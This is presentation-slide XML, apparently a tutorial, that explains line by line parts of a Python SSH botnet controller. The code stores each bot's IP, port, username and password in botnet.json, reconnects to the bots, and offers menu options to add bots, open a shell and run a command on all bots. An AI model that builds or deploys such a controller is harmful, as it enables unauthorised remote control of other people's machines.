              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'], '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'], '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>']} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>for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client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in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botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>]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Creates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list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dictionaries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with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each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bot's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details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with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open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>botnet.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>', 'w') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> f: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Opens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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>botnet.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>file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writing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json.dump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botnet_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>, f)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Writes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botnet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data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file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78465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8D6A32C-626B-DD25-5535-6EA2E55B1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73" y="266018"/>
            <a:ext cx="11882927" cy="640232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uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def load_botnet():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Defines the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>load_botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> function to load the botnet from a file.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>global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botnet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Declares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</a:rPr>
              <a:t>botnet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as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global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variable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botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = []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Clears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current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botnet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list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try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Starts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try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block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handle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potential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exceptions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with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open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>botnet.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>', 'r') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> f: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Opens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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>botnet.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>file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reading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botnet_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>json.load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(f)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Loads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botnet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data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from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file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for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client_data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in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botnet_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Iterates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through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each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bot's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data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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>connect_ssh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client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'])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Reconnects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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server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if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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Checks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connection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was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successful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client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session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Adds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session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bot's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data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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>botnet.append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client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Adds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botnet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list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print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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + f"[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Reconnected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to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bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>']}")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Prints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success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message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>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>else:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: If the connection failed.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>print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Fore.RED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + f"[!] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Failed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to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reconnect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to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bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>']}.")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Prints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error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message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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>except FileNotFoundError:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: If the file is not found.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>botnet = []</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Initializes the botnet list.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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9149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6E4EB-5A98-0204-56B6-DA51FADE6FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2849" y="2849"/>
            <a:ext cx="12164937" cy="76328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1400" b="1" dirty="0"/>
              <a:t>botnet = []</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Initializes the botnet list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1"/>
              <a:t>load_botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Loads the botnet from the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>while True:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Starts an infinite loop for the main menu.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/>
              <a:t>print("")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prints a blank line for spacing.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err="1"/>
              <a:t>display_menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Displays the menu.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/>
              <a:t>option = input(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1"/>
              <a:t>Fore.YELLOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> + "Enter any option: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prompts for an option.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/>
              <a:t>if option == '1':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: If option 1 is selected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>if botnet:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Checks if the botnet list is not empty.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="3" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>for client in botnet:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Iterates through each bot in the botnet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="3" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1"/>
              <a:t>Fore.CYAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> + str(client))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prints the bot's details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>else:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: If the botnet list is empty.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="3" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1"/>
              <a:t>Fore.RED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> + "Botnet is empty.")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prints an error message.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err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t> option == '2':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: If option 2 is selected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ask_for_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Calls the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ask_for_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> function.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 err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> option == '3':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: If option 3 is selected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>bash()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Calls the bash function.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 err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> option == '4':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: If option 4 is selected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>host = input("Enter the bot's IP address: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prompts for the bot's IP address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>port = input("Enter the bot's SSH port number: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prompts for the bot's SSH port number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>user = input("Enter the bot's username: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prompts for the bot's username.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>password = input("Enter the bot's password: ")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prompts for the bot's password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>add_client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>(host, port, user, password)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Adds the bot to the botnet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>save_botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Saves the botnet to the file.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 err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> option == '5':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: If option 5 is selected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>command_for_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Calls the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>command_for_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> function.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 err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> option == '6':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: If option 6 is selected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>save_botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Saves the botnet to the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>sys.exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Exits the program.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/>
              <a:t>else:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: If an invalid option is selected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>print("Invalid option. Please choose a valid option.")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Prints an error message.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41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47C7E2B-915F-1CDF-AE39-3283A8DF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263525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uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>import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sys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Imports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</a:rPr>
